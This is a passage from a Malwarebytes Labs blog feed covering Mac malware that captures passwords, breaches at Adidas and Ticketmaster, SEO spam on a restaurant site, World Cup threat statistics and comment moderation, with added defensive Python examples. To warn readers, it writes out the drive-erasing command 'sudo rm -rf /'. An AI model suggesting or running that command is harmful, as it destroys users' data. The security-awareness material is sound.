Fortunately, this script was not malicious, but it easily could have been, and its obfuscated nature should have raised suspicions. Yet users still ran it, without any understanding of what it did, because they trusted a stranger on a forum.

There have been other cases in the past of scripts being posted that were actually malicious in nature. The most well known of these was an infamous trick where users were told to run the following command to cure whatever problem they were having:

sudo rm -rf /

Unfortunately for users who actually followed directions like these, this command actually erases the hard drive.

Thus, there’s precedent for being suspicious of shell scripts posted online, yet even so, many people will still run highly suspicious scripts without a care. Readers are encouraged to educate users about the dangers of this behavior at every opportunity.

Risks posed by previous infections

When first run, the script executable asks for a password. This looks like the standard sudo behavior in the command line, but actually, the malware is capturing the password. The malware creates a couple of small data files called dumpdummy—one in /Users/Shared/ and one in /tmp/—and stores the password there, presumably for possible future use.

Having your password stored in clear text inside a file that can be readable by anyone on the computer poses a serious security threat. Worse, since this file is just data and not actually malicious, it’s likely that most antivirus software won’t detect it. This means that you might have removed the infection, but the dumpdummy file remains, posing a possible future security risk.

This is far from the first time that malware has done such things. This means that, even if your computer is not currently infected, it’s entirely possible that your password can be found in clear text somewhere on your hard drive, as a remnant from a previous infection. Future malware could be designed to find the locations of these files created by the previous malware, gaining access to your password for free.
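An added example (not Malwarebytes’ code) of the kind of remnant sweep the section above argues for: it checks the two dumpdummy locations the post names and parses launch daemon/agent plists for programs living in temporary or shared directories, the pattern a downloaded-to-/tmp script kept alive by a launch daemon would leave. The directory lists and the “suspect prefix” heuristic are assumptions for this example; the paths can be overridden so it can be pointed at a mounted disk image.

```python
"""Sweep for OSX.Dummy-style remnants: password files and persistence (added example)."""
import plistlib
from pathlib import Path
from xml.parsers.expat import ExpatError

# Locations the post says the cleartext password files were written to.
REMNANT_DIRS = ("/Users/Shared", "/tmp")
REMNANT_NAME = "dumpdummy"
# Assumption for this example: a persistence item whose program lives in a
# temporary or shared directory deserves a look.
SUSPECT_PREFIXES = ("/tmp/", "/var/tmp/", "/Users/Shared/")
LAUNCH_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents")


def find_password_remnants(dirs=REMNANT_DIRS, name=REMNANT_NAME):
    """Return the dumpdummy files that still exist in the given directories."""
    return [str(Path(d) / name) for d in dirs if (Path(d) / name).is_file()]


def _program_targets(plist):
    """Collect every executable path a launchd plist references."""
    args = plist.get("ProgramArguments") or []
    targets = [str(a) for a in args] if isinstance(args, list) else []
    if plist.get("Program"):
        targets.append(str(plist["Program"]))
    return targets


def suspicious_launch_items(dirs=LAUNCH_DIRS):
    """Parse launchd plists and report those pointing into suspect directories."""
    findings = []
    for d in dirs:
        for plist_path in sorted(Path(d).glob("*.plist")):
            try:
                with plist_path.open("rb") as fp:
                    data = plistlib.load(fp)
            except (plistlib.InvalidFileException, OSError, ValueError, ExpatError):
                continue  # unreadable or malformed plist: skip, keep sweeping
            if not isinstance(data, dict):
                continue
            hits = [t for t in _program_targets(data) if t.startswith(SUSPECT_PREFIXES)]
            if hits:
                findings.append({
                    "plist": str(plist_path),
                    "label": data.get("Label"),
                    "targets": hits,
                    "keep_alive": bool(data.get("KeepAlive")),  # relaunches on exit
                })
    return findings


def sweep(remnant_dirs=REMNANT_DIRS, launch_dirs=LAUNCH_DIRS):
    """Run both checks and return a single report dict."""
    return {
        "password_files": find_password_remnants(remnant_dirs),
        "launch_items": suspicious_launch_items(launch_dirs),
    }


if __name__ == "__main__":
    print(sweep())
```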

Malwarebytes for Mac will remove such traces in addition to the malicious executables.

Risks posed by unsigned malware

Most, though not all, Mac malware these days is cryptographically signed with a certificate issued by Apple. These certificates are not hard to obtain, costing no more than $99 to get a developer account with Apple. The good thing about this is that once the malware is spotted by Apple, the certificate can be revoked, killing the malware.

However, there are some issues with the way macOS handles code signing, and this can’t be relied on. As Wardle pointed out in his analysis, the fact that this malware is not signed is irrelevant, since macOS does not check the code signature for a process that is executed from the command line.

More information on how code signing can be a problem on macOS will be presented at this year’s Virus Bulletin conference.

Target: cryptocurrency theft

In all, this malware is not highly likely to be widespread, and you’ll probably know if you’ve been infected after reading a description of the malware.

We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.

If you think you might have been infected, Malwarebytes will remove the malware, including the dumpdummy files containing your password.

If you do IT or security work for a business, be sure to block access to the IP address that the shell script will try to connect to (

The post Mac malware targets cryptomining users appeared first on Malwarebytes Labs.


A week in security (June 25 – July 1)

Malware Bytes Security - Mon, 07/02/2018 - 1:56pm

Last week on Labs, we looked at comment moderation duties, Viagra spam on a news-making restaurant’s website, and how to manage your child’s online presence for Internet safety month. We also looked at a set of big breaches and leaks, as well as malware threats with a World Cup vibe.

Other news

Stay safe, everyone!

The post A week in security (June 25 – July 1) appeared first on Malwarebytes Labs.


Major data breaches at Adidas, Ticketmaster pummel web users

Malware Bytes Security - Fri, 06/29/2018 - 2:00pm

There’s been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you’ll want to do some due diligence and see if you’ve been affected. These aren’t small fishes being preyed upon by black hats; we’re talking Adidas, Ticketmaster, and Exactis, the last one being a particularly big issue, despite being a company you may not have even heard of up until now. Shall we take a look?

This breach isn’t very sporting

Adidas, famous sporting equipment creator, revealed a breach in a somewhat short public statement late on Thursday evening. They stated:

According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords. Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.

While there’s no information on exact numbers at this stage beyond references to “a few million,” they do mention that the only customers affected so far are thought to be those who made a purchase via

Something of note: They claim to have first noticed the breach on June 26, and have made a public notification two days later. In a realm where huge data breaches can be revealed many months or in some cases years after an attack has taken place, this is impressive (though also now required by GDPR).

It’s important to recognise, however, that at this point, we don’t know if the breach itself took place on June 26 or if Adidas became aware of it on that date, because it sounds as though someone noticed a third party trying to sell the stolen data. All the same, this is a rapid turnaround and helpful for anyone wishing to keep an eye on transactions after having used the above Adidas portal.

The golden ticket

The UK didn’t escape from the blast of breaches rumbling on beneath the surface, as the massive ticket sales/distribution company Ticketmaster fell foul of payment data shenanigans. A code library used to power a third-party customer support agent is claimed to have been sending payment data to an unknown third party whenever a customer bought tickets. According to the statement provided by the support agent tool creators, a single unauthorised line of JavaScript was all it took to cause the problem.

That single line of code, implemented on the payment page, has resulted in up to 40,000 people having their data swiped. If you made a payment somewhere around February to June this year, or anything from September 2017 to this week if you’re an international customer, you could be at risk. Where this story becomes particularly problematic is that digital bank Monzo claims they tried to warn Ticketmaster about the problem back in April of this year, but their warnings went unheeded. Now they’re faced with a so-called perfect storm of bad comms and a significantly harsher round of press-related spotlights.

Fixing a leak

This last incident is less about payment information and more about personal information. It’s also more accurately described as a potential accidental exposure of information, which others may have accessed without permission. Exactis, a marketing firm with a “universal data warehouse” storing 3.5 billion consumer, business, and digital records, have found themselves at the heart of the controversy due to researcher Vinny Troia finding a large slice of data on a publicly-accessible server.

The data are made up of some 340 million records, weighing in at about 2 terabytes. The records contained incredibly detailed information on American consumers, including home addresses, phone numbers, emails, and other “personal characteristics,” including habits, children’s ages, and more. At time of writing, no payment or social security information has been found—so that’s one small silver lining.

However, anyone caught up in the exposed data could find themselves at increased risk of phishing or social engineering attacks if criminals were able to dig into it before the researcher sounded the alarm. It also means bad actors could potentially use detailed information to impersonate the person on file and use that to social engineer someone else.

What can I do?

Unfortunately, there’s only so much you can do in front of your computer where a breach is concerned, because unlike the device in front of you, it’s almost entirely out of your hands. When data is exposed, or someone grabs a pile of payment information, much of what happens next is down to the company responsible for safe keeping. Are payment records encrypted? Are passwords recorded in plain text? Is your entire personal history sitting on a server somewhere, ready to be grabbed by a crew of black hats or a curious observer?

A touch alarming, perhaps, but that’s the reality of doing business online, whether you’re looking to buy something, register somewhere, or simply hand over marketing information while browsing the web. If you’re caught in a breach or a leak, then perform due diligence and cancel your cards, heighten your awareness for phishing/social engineering scams, and take advantage of the typically free credit monitoring services offered post incident. If you follow those directions, you’re doing everything you can to keep things under control on your end.

The important thing to remember is not to panic, and don’t feel too bad should you believe your information to be compromised. We’re probably all going to end up in that position at some point, so you’re in good company.

The post Major data breaches at Adidas, Ticketmaster pummel web users appeared first on Malwarebytes Labs.


Internet Safety Month: How to manage your child’s online presence

Malware Bytes Security - Thu, 06/28/2018 - 11:32am

When you hear the term “reputation risk management,” you might think of a buzzword used in the business sector. Reputation risk management is a term used to describe how companies identify potential risks that may harm their reputation and mitigate them before they blow up.

As companies grow, so grows their public reputation. Heading potential PR disasters or credible crises off at the pass can keep organizations from losing revenue, confidence, and trust from their clients. Suffice it to say, putting your best foot forward and keeping it there is crucial.

Now, here’s a thought: If businesses know they have much to lose if their reputation is threatened, shouldn’t parents and guardians also consider that their children can lose out if their digital footprint is at risk?

To cap off Internet Safety Month, we’re going to ditch the buzzword in favor of a phrase that parents, teens, and young kids can easily grasp: You must manage your online presence. Before we delve into how parents and guardians can take charge, it is crucial that we first understand one thing when it comes to having a digital life:

Your online presence is your online reputation 

Our digital footprint starts the moment we or someone we know shares something about us online. This could be a solo or group photo, a Facebook status update, or a name mention in a Tweet. Even those who claim to be inactive on the Internet can still have an online presence, thanks to other people in their lives.

Our footprints don’t stop at our first “Hello, World!” though. The more we use the Internet, and the more we’re included in other people’s social media feeds, the more of our footprints are left for anyone online to see. These marks we leave behind can be collectively referred to as our online presence. How we present ourselves to and conduct ourselves in the digital world affects how people perceive us online—now and in the future.

Having an online presence, whether it’s a positive or negative one, affects our reputation—online and in the real world. If “Jane Doe” is known to exhibit behavior tantamount to bullying in a forum she frequents, she already has a bad reputation in that community. Who she is and how she behaves in that community can also spill over to other online forum communities as well.

There are consequences for bad behavior online. She may be blocked from those communities. Or worse, someone may Google her name and become aware of her bullying behavior online. She could feel the impact of her negative actions in the workplace or beyond: when coworkers or friends become aware that Doe engages in bullying in forums, they may assume that she has a tendency to bully people in real life as well.

Leaving negative digital footprints online, then, is no longer an option.

What you can tell your kids to manage their online presence

“Google yourself.” Maybe it has been a while since your kid started using the Internet, or you and your child are just curious about what might come up. (Hint: type your name in quotes.) Either way, it’s advisable to look up where your name, public posts, and/or photos end up every now and then.

If your child has a common name, you can further add modifiers (like the school they go to or the city/state/town you live in). Just run many searches with varying modifier combinations and see what comes up. As for photos, you can use Google’s image and reverse image searches. To do the latter, go to the Google Image Search page and click the camera icon in the search bar. You can then paste the URL of an image you have of your child (in the first tab) or drag-and-drop to upload their picture (in the second tab), so Google can crawl the web in search of other copies of the one you just provided.

Google Image Search page processing the image you uploaded for reverse lookup

Other things you can use to search for are email addresses, social media usernames, and phone numbers. You can also set up Google to alert you if other information about your child (like their name) pops up on the Internet at some point in the future.

“Watch out for information you don’t want made public.” It’s possible that you may have already stumbled upon a few pieces of information or pictures you or your child may not want online, or at least visible to the public. This information may have been put up years ago or yesterday.

Posts can be easily removed on sites you or your child can control, such as Facebook and Twitter. But for third-party sites, it may need a bit of legwork. For copyrighted material such as photos, you can contact the site owners and reference the Digital Millennium Copyright Act (DMCA) [PDF]. As the parent or responsible adult, you may also need to contact each website that has information about your child that you don’t want there.

It’s also time to review those security and privacy settings of your child’s accounts to see if there has been a policy update or if you need to modify additional settings.

Read: Internet Safety Month: How to protect your child’s privacy online

“Start cleaning up your online act.” A good starting point will be teaching them good computing and Internet practices, if you haven’t already. We have various references on how one can do this here on the Malwarebytes Labs blog. So to avoid reinventing the wheel, below are the links you may want to visit and read up on:

The work doesn’t stop here, though. Parents and guardians should also put great emphasis on kindness, understanding, and patience when they deal with other Internet users. Hiding behind a screen is no excuse to forgo these values.

Lastly, impress in them the idea of thinking first before posting anything. Online, it’s easy enough for anyone to misconstrue what one is trying to say because cues like facial expressions and body language are non-existent. A flippant joke or a sarcastic remark could start a flame war. Even an innocent post can sometimes get someone else in trouble.

“Deactivate/Delete accounts you’re no longer using.” This may seem obvious, but at times, accounts that are no longer used are left active for an indefinite and extended period because your child may have decided to use another account, or wholly avoided people in a particular online community. The latter is one of the best reasons why your child’s account should be deactivated. This is especially helpful if, for example, your child was caught in a crossfire between warring parties and one group started targeting him or her via that account. Save everyone the headache (and the insanity) and deactivate the account.

In a perfect world…

…every Internet user would be sharing all of their achievements, and everyone would be applauding. Every Internet user would be encouraging everyone who needs encouraging. Every Internet user would be honest, civil, and tactful. Every Internet user would be sharing photos of only their best, wholesome selfies, their cats, and funny GIFs.

But this isn’t a perfect world. Someone will always say something that another may find offensive. Someone will put someone else down, talk in Caps Lock, and share photos of their wild partying or of a drunk friend who passed out on a sidewalk. In the end, realize that there is data online about someone that puts them in a bad light. Your child may not be exempted. So help them take control and guide them on how to be more responsible with what they share now and in the future.

Good luck!

The post Internet Safety Month: How to manage your child’s online presence appeared first on Malwarebytes Labs.


Red Hen website suffers SEO spam compromise

Malware Bytes Security - Wed, 06/27/2018 - 5:11pm

If you’re thinking about checking out the website owned by the restaurant that asked White House press secretary Sarah Huckabee Sanders to leave the premises, you might want to hold off. There’s some site compromise action afoot.

Although the homepage appears to be acting in a perfectly normal manner, turning off scripts so you can see what’s happening under the hood provides a rather stark visual discrepancy.

Visiting as normal:


Visiting with scripts turned off:


Why yes, that’s a collection of Viagra spam text injected into the website with the aim of giving a search engine boost to the sites linked. What you’re seeing here is the otherwise “hidden” code leaking through onto the page; it actually resides in the HTML source like so:


The sites hoping to get a search engine boost from the compromised restaurant page are pushing pharmaceuticals. Here’s the first example, a shopping portal for Generic Viagra:


The second is for a prescription drug I’m not even going to attempt to pronounce:


Old hat

This is an absolutely ancient black hat tactic, most typically referred to as a form of SEO (Search Engine Optimisation) spam, or “Spamdexing.” Threat actors either use dirty SEO tactics to drive high traffic to their pages or they capitalize on already highly-trafficked targets by hiding their links in subtext. The most common forms down the years have tended to be one of the following:

  1. Keyword stuffing, where lots of content-specific words are jammed into the text of an article to artificially drive traffic in ways that would otherwise make little sense.
  2. Scraper sites, which pillage content from other places and occasionally remove things like the author or company name, hoping to make some ad-based revenue from the multitude of flashing banners hosted on their own website.
  3. Hidden text, where a website is filled with content the same colour as the background and placed across multiple pages in an effort to boost links/ranking for the linked sites in question. This can be content added deliberately by the webmaster, but it can also come about as a result of a hacked website.

A fourth variant of SEO poisoning would be where a hacker added malicious files to a site and drew visitors there through bogus search results, but services such as Google have been cracking down on this for years.
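Hidden-text spam of the kind found on the Red Hen site can be caught in page source without rendering it. Here is an added example (not Malwarebytes’ code) that walks an HTML page, tracks subtrees hidden by inline styles or the hidden attribute, and reports those that carry clusters of outbound links or pharmaceutical keywords; the sample page, the hiding patterns and the keyword list are constructed for this example.

```python
"""Find hidden SEO spam blocks in HTML source (added example)."""
import re
from html.parser import HTMLParser

# Inline-style tricks commonly used to keep injected text off-screen.
HIDE_PATTERNS = tuple(re.compile(p) for p in (
    r"display\s*:\s*none",
    r"visibility\s*:\s*hidden",
    r"font-size\s*:\s*0(px|em)?\b",
    r"(left|top|text-indent)\s*:\s*-\d{3,}px",
))
SPAM_TERMS = ("viagra", "cialis", "pharmacy", "generic")
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}

# Constructed sample: a normal restaurant page, a legitimately hidden mobile
# menu, and an injected pharma block hidden with display:none.
SAMPLE_PAGE = """<html><body>
<h1>The Hen House</h1><p>Farm-to-table dining. <a href="/menu">Menu</a></p>
<nav style="display:none" id="mobile-nav"><a href="/contact">Contact</a></nav>
<div style="display: none"><p>Buy generic viagra online cheap
<a href="http://pharma-spam.example/one">viagra</a>
<a href="http://pharma-spam.example/two">cialis</a>
<a href="http://pharma-spam.example/three">pharmacy</a>
<a href="http://pharma-spam.example/four">order</a></p></div>
</body></html>"""


class HiddenBlockFinder(HTMLParser):
    """Collect text and links from every outermost hidden subtree."""

    def __init__(self):
        super().__init__()
        self.stack = []          # one bool per open element: does it hide content?
        self.current = None      # block being collected, if inside a hidden subtree
        self.block_depth = 0     # stack depth at which the current block started
        self.blocks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get("style") or "").lower()
        hides = "hidden" in a or any(p.search(style) for p in HIDE_PATTERNS)
        if self.current is not None and tag == "a" and a.get("href"):
            self.current["links"].append(a["href"])
        if tag in VOID_TAGS:
            return                           # no end tag will follow; keep stack aligned
        self.stack.append(hides)
        if hides and self.current is None:
            self.current = {"tag": tag, "text": [], "links": []}
            self.block_depth = len(self.stack)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs) if tag in VOID_TAGS else None

    def handle_data(self, data):
        if self.current is not None:
            self.current["text"].append(data)

    def handle_endtag(self, tag):
        if not self.stack:
            return
        self.stack.pop()
        if self.current is not None and len(self.stack) < self.block_depth:
            text = " ".join(" ".join(self.current["text"]).split())
            self.blocks.append({"tag": self.current["tag"], "text": text,
                                "links": self.current["links"]})
            self.current = None


def find_hidden_spam(page, min_links=3):
    """Return hidden blocks that look like SEO spam (many links or spam terms)."""
    parser = HiddenBlockFinder()
    parser.feed(page)
    parser.close()
    findings = []
    for block in parser.blocks:
        lowered = block["text"].lower()
        terms = [t for t in SPAM_TERMS if t in lowered]
        if terms or len(block["links"]) >= min_links:
            findings.append({**block, "spam_terms": terms, "link_count": len(block["links"])})
    return findings


if __name__ == "__main__":
    for finding in find_hidden_spam(SAMPLE_PAGE):
        print(finding["tag"], finding["link_count"], finding["spam_terms"])
```

A hidden nav with one link and no keywords is not reported, so a site’s own collapsed menus do not drown out the real injection.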

The fallout

While compromises of this kind may give a slight, fleeting edge to the scammers pushing their wares, it can do significant damage to the webmaster’s online business. Everything from page rank to general trustworthiness all take a nose dive in the eyes of Google, and it can be hard to get things back on track.

In this case, the Red Hen site is running on WordPress, so it’s possible an exploit targeting the popular platform or one of its plugins was used. It could even be down to something as basic as gaining access using default admin credentials, or a webmaster being caught up in a phishing scam. We couldn’t say for sure, though attacks on content management systems have been ramping up over the last quarter. Regardless of the break-in method, the site owners definitely have some cleaning up to do.

If you’d like to delve deeper into the art of SEO, we have a couple of links you can browse.

SEO poisoning: is it worth it?

Google’s featured snippets abused by SEO scammers

A guide to website security

Otherwise, pay attention to search results when hunting around online. If you’re expecting to see a result for an eatery located in Lexington but instead find a webpage related to cars and written in Japanese—someone is likely giving Google the slip by abusing its algorithms in order to boost phony results.


And if you do find your favorite restaurant is serving up Viagra instead of farm-to-table, you might want to do things the old fashioned way: Grab a leaflet and order takeout.

The post Red Hen website suffers SEO spam compromise appeared first on Malwarebytes Labs.

Categories: Malware Bytes

World Cup 2018: malware attacks gunning for goal

Malware Bytes Security - Wed, 06/27/2018 - 2:29pm

World Cup 2018 is upon us and in full swing, bringing together 32 nations for a month of footballing to see who’ll be crowned World Champion. With the tournament underway, we thought it’d be fun to see which of the footballing powerhouses also expended a similar amount of energy fighting off malware attacks.

From January 1 until June 14, the day the World Cup matches began, we gathered up all of our data on registered threats per country, seeing which “teams” attracted the most attacks, and which slipped under the malware radar. Shall we take a look?

The rules of the game

We generally regard the “winner” of a game as the one who, well, wins. Score the most goals, beat the opponents, and move onto the next stage until victory is yours. That doesn’t quite work when talking about malware attacks on a collection of nations, however. In our wacky realm of World Cup–themed malware antics, the winner is the loser, in a way.

For example, do you think the nation being hammered with the most attacks is feeling like much of a champion?

Perhaps your take is that the true victor is the team who receives the smallest number of attacks. But that doesn’t necessarily mean that the country is doing a bang-up job defending against malware.

Maybe their infrastructure isn’t as interesting to criminals as one belonging to a larger nation. Perhaps they’re missing a number of home-grown hackers who code terrible things in their spare time. Whatever the reason, some other countries just aren’t seeing the same amount of malware as the “winners.”

Whatever your stance, we’ve got you covered with one of those gigantic novelty football tarps.

First half

Russia is the hands-down “winner” in terms of sheer volume of attacks, with a total of 5,942,715 malware threats received since the beginning of the year. With just over 1,500 threats per hour, Russia is most under fire from adware (1,940,814 cases), cryptomining (1,116,872 cases), and Trojans (987,233 cases).

Brazil, with 5,789,375 registered malware threats since the beginning of the year, is close behind Russia in second place. Their goal was most frequently hammered by adware (1,508,125 cases) and cryptomining (948,143).

France exit the stadium with a strong third-place position, feeling the non-stop press of attacks down their left flank. Or right? I don’t know, I play tennis. Regardless of football technique, they weigh in with 3,605,444 registered malware attacks, which is, frankly, a terrifying amount of footballs.

Germany, the 2014 World Cup Champion, is a football powerhouse you may have expected to be equally matched in malware threats. However, just like their mediocre start to World Cup play, they crawl into a “disappointing” sixth place at the half, with 1,987,421 threats counted since the beginning of the year. They complement their ability to knock England out of competitions with penalty kicks from the adware sector (608,816) and Trojans (342,156).

The nations with the fewest registered attacks in 2018 are Iceland (17,946 malware cases), Senegal (26,847), and Nigeria (97,938). The current European (football) Champion, Portugal, falls just outside of the top 10 biggest targets, with a total of 770,827 registered cases.

Among the 32 nations, adware, cryptomining, and Trojans were the dominant threats between January and June, with a significant increase in adware since the beginning of the second quarter.

Second half

What I’m mostly here for, though, is to see how England are faring in the football/malware stakes.

The answer is, of course, middle-of-the-table mediocrity, because the last time we won anything was 1966. Remember though, we’re in the land of the upside down, where being top of this chart, in particular, may not be a good thing.

While England isn’t stealthily evading all cybercriminals like Nigeria or Iceland, we still put in a reasonable performance at 20 out of 33, nestled between Saudi Arabia (430,953 attacks) and Croatia (381,364).

One of the biggest attackers aimed at England’s goal line is the ubiquitous cryptominer, with 214,615 threats registered in total, panning out to about 1,430 attacks a day. Trojans have another strong showing with 42,241 in total—that’s a daily tally of about 280. Finally, we have a rousing performance from adware, which aimed 34,495 total threats at England at a pace of about 229 per day.

I’m guessing we’re still going out about five nil to Brazil, though.

Extra time

But what regular gameplay doesn’t cover is the number of social engineering tactics deployed against countries participating in the World Cup (and others besides). Events garnering global attention also find what they don’t seek—foul play.

There have been some clever football-themed scams over the years, and it’s possible some of these may be brought out to score a last-minute goal for cybercrime. Let’s take a look at some of the scams of World Cups past and how you can defend against them.

Videogame-themed phishing

We observed a number of scams released during the last World Cup, many of which used a gaming theme as they rode on the coattails of the enormously successful FIFA Football titles produced by EA. In 2018, football games are still incredibly popular, and it’s World Cup season once again.

One such gaming scheme used social media accounts offering up football freebies in return for logging into third-party websites. Here’s a fake EA account on Instagram:

Here’s the final destination, a phishing page harvesting gaming accounts:

A result for phony streaming

Fake football match streams are always popular, and we saw a wave of them at the last World Cup, the majority of which redirected to surveys and other assorted nonsense.

A dangerous sliding tackle (into your DMs)

In 2014, we also saw a novel social engineering technique used, where fake support accounts dropped themselves into chats between customers and verified support channels, then directed victims to phishing pages.

In this case, it was a phish for the Origin gaming platform:

While the above was a fairly generic phish attack, many were specifically pinned around World Cup imagery and gaming, like this one:

Phishing mails pipped at the post

Another common tactic come World Cup time: fake “You’re a winner!” emails claiming millions of dollars and free tickets are waiting in the wings. Here’s one example from the last World Cup:

Claiming to be the “FIFA Online Promotions Coordinator,” the sender requested the kind of personal information usually grabbed in the early stages of an advance fee fraud scam. This definitely wouldn’t result in free tickets, but it may well have resulted in a hat trick for enterprising scammers nabbing some easy cash.

Defensive strategy

To defend against malware threats and other scams around World Cup time, you should familiarize yourself with some of the common scam tactics being deployed. Dubious emails are already in circulation this year, and there are still a few weeks left for malware miscreants to ruin your day.

Keep your security software and operating system up-to-date, steer clear of “too good to be true” offers, and you’ll have a safe and incident-free World Cup. While the players might enjoy a well-deserved break after the game has ended, in the realm of malware creation, the attackers are still playing long after the final whistle blows.

The post World Cup 2018: malware attacks gunning for goal appeared first on Malwarebytes Labs.

Did my comment on your blog get lost?

Malware Bytes Security - Mon, 06/25/2018 - 1:00pm

If you ever feel bad about your job because of mindless tasks you must perform day after day, or if you’re bothered by the fact that your chosen work pays crap, produces nothing useful, and helps no one: have a look at blog comment spammers and breathe a sigh of relief. They make almost any job look fantastic by comparison.

Unfortunately, they also spam up the very comment sections where people might go for a little break from work doldrums. When that happens on our site, we must take measures to protect our users. Read on to learn about the types of comment spam you might see, why they are banned, and why a good comment may sometimes take a while to appear on Malwarebytes Labs.

Mindless comment bots

To protect our users against the “produce” of mindless bots, we have had to take counter measures that unfortunately sometimes result in benevolent posts getting blocked. However unfortunate, we prefer this situation to one in which our readers could get infected or scammed after clicking on something that they have found in our blog comments. That would go against everything this blog and company stand for!

Because most of the bad comments are blocked silently, readers will only see a small selection of spam—the tip of the garbage iceberg. If I had to guess, I’d say for every comment we have had to remove manually, a few hundred were blocked by the Disqus filters that we have in place to auto-moderate our comments section.

Our filters

So now you may be reading this because your comment did not show up where you expected to find it. Most comments are approved without being reviewed by a moderator because of our automated filtering. Some comments, however, will be held by our filters to wait for moderation. A comment is held for moderation because it contains any one of the following:

  • Certain cuss words that are not suitable for all audiences. We know the current filters are strict, but we want discussion on our site to remain civilized and family-friendly.
  • Links and URLs. Any site that looks legitimate can, in fact, be malicious, so we rely on a human review to make sure links and URLs are safe.
  • Email addresses. This is not only to protect other readers, but the commenter as well. If you like your inbox to be filled daily with all kinds of “special offers,” go ahead and post your email address in a comment section that allows it.
  • Users with a low reputation, or in other words, known spammers and abusive users.

Manual moderation

If a comment meets any one of the criteria above, our filters put it in a moderation queue, which must be dealt with by one of our human moderators. Unfortunately, Labs doesn’t have an unlimited amount of comment moderators—there are only a few of us, and we’re mostly focused on gathering intel and writing the posts. Sometimes it takes a while before we find a comment that should have been allowed, and that adds something valuable to the discussion.

Most of the time, commenters figure out what was wrong with their comment and post an altered version without links or “bad language.” However, we hope this blog will now help those who didn’t know how to troubleshoot their own comment.

Favorite subjects

If you decide to post a comment that deals with certain subjects, the chances of your comment getting flooded by mindless bots are high, because even though comment spammers have many favorite subjects, our blog scores high for certain keywords, which bring in the spammers. These subjects are:

  • ATM cards
  • Cryptocurrencies
  • Tech support scammers
  • Hackers (for hire)
  • Bitcoin

The fun part—for us anyway—is that when we warned our readers about a group of scammers that tried to peddle unlimited ATM cards on Facebook, the same scammers started posting comments under that article about why their ATM cards are the best, the cheapest, or the most trustworthy.

In fact, I’m pretty sure this post, with the proper keywords in place, will be a real honeypot for comment spammers in the categories we highlighted. And I’m not afraid that this remark will make a difference one way or the other. If anything, comment spammers have taught us that they either can’t or don’t bother to read our posts.

Are they bots?

It appears that most of our comment spammers are bots. Their behavior says just as much as the (misspelled) words in their comments. Bots can be sussed out by any one of the following behaviors:

  • Their posts are pre-formatted. They’ll cut and paste the same post over and over, even if there are spelling mistakes.
  • They are attracted by certain keywords, even if they are out of context.
  • They come from IPs that post more (spammy) comments than any single human user could ever produce.
  • Their post contains email addresses and usernames that were created by a random name generator.
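The two lists above (the filter criteria under “Our filters” and the bot behaviors just listed) describe a moderation pipeline in prose. The following Python is an added illustration of how such a pipeline can be implemented; it is not the Disqus or Akismet filtering that Malwarebytes Labs actually uses. The cuss-word list, the low-reputation user, the IP threshold and the “generated name” heuristic are constructed assumptions for the demo, as are the sample comments and IP addresses.

```python
"""Comment moderation filter modelled on the rules described in the post:
hold single comments that contain profanity, links, e-mail addresses or come
from low-reputation users, and flag bot-like behaviour across a whole batch.
Added illustration; not the site's real Disqus/Akismet configuration."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

URL_RE = re.compile(r"\b(?:https?://|www\.)\S+", re.IGNORECASE)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed lists for the demo; a real deployment would load these from config.
BLOCKED_WORDS = {"crap", "damn"}          # stand-ins for the site's cuss-word list
LOW_REPUTATION_USERS = {"atmcards4u"}     # known spammers / abusive users
# Topics the post says attract spammers; drives the keyword signal below.
SPAM_KEYWORDS = ("atm card", "bitcoin", "hacker for hire", "tech support")


@dataclass(frozen=True)
class Comment:
    user: str
    ip: str
    text: str


def moderation_reasons(c: Comment) -> list[str]:
    """Return why a single comment would be held (empty list = auto-approve)."""
    reasons = []
    words = set(re.findall(r"[a-z']+", c.text.lower()))
    if words & BLOCKED_WORDS:
        reasons.append("profanity")
    if URL_RE.search(c.text):
        reasons.append("link")           # every link gets a human review
    if EMAIL_RE.search(c.text):
        reasons.append("email")          # protects the commenter's inbox too
    if c.user.lower() in LOW_REPUTATION_USERS:
        reasons.append("low_reputation")
    return reasons


def _normalize(text: str) -> str:
    # Collapse case and whitespace so a pasted duplicate still matches.
    return " ".join(text.lower().split())


def looks_generated(name: str) -> bool:
    """Heuristic (an assumption, not a rule from the post): generator-style
    handles mix letters with three or more digits and have no vowels."""
    letters = re.sub(r"\d", "", name)
    digits = sum(ch.isdigit() for ch in name)
    return digits >= 3 and bool(letters) and not re.search(r"[aeiou]", letters, re.I)


def bot_signals(batch: list[Comment], per_ip_limit: int = 5) -> dict[str, list[str]]:
    """Flag behaviour that is only visible across a batch of comments.
    Returns {user: [signals]} for every user with at least one signal."""
    signals: dict[str, set[str]] = defaultdict(set)
    text_counts = Counter(_normalize(c.text) for c in batch)
    ip_counts = Counter(c.ip for c in batch)
    for c in batch:
        if text_counts[_normalize(c.text)] > 1:
            signals[c.user].add("duplicate_text")   # same pre-formatted post pasted repeatedly
        if ip_counts[c.ip] > per_ip_limit:
            signals[c.user].add("ip_volume")        # more posts from one IP than a human writes
        if any(k in c.text.lower() for k in SPAM_KEYWORDS):
            signals[c.user].add("spam_keyword")     # keyword bait, regardless of context
        if looks_generated(c.user):
            signals[c.user].add("generated_name")
    return {u: sorted(s) for u, s in signals.items()}


# Constructed sample batch: two humans and one bot pasting the same comment six times.
SAMPLE_BATCH = [
    Comment("alice", "203.0.113.5", "Good writeup, thanks for the SamSam details."),
    Comment("bob123", "203.0.113.9", "Contact me at bob@example.net for the PDF."),
    *[Comment("xkq7382p", "198.51.100.7", "Buy BITCOIN hacked ATM card now www.example.com/atm")
      for _ in range(6)],
]

if __name__ == "__main__":
    for c in SAMPLE_BATCH[:3]:
        print(c.user, moderation_reasons(c))
    print(bot_signals(SAMPLE_BATCH))
```

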